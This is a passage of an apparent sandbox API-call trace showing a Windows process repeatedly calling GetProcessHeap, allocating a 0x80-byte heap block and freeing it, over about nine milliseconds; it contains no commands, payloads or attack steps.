(HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.861] GetProcessHeap () returned 0x280000 [0059.861] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.861] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.862] GetProcessHeap () returned 0x280000 [0059.862] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.862] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.863] GetProcessHeap () returned 0x280000 [0059.863] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.864] GetProcessHeap () returned 0x280000 [0059.864] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.864] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.865] GetProcessHeap () returned 0x280000 [0059.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.865] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.866] GetProcessHeap () returned 0x280000 [0059.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.866] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.867] GetProcessHeap () returned 0x280000 [0059.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.867] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.868] GetProcessHeap () returned 0x280000 [0059.868] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.869] GetProcessHeap () returned 0x280000 [0059.869] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 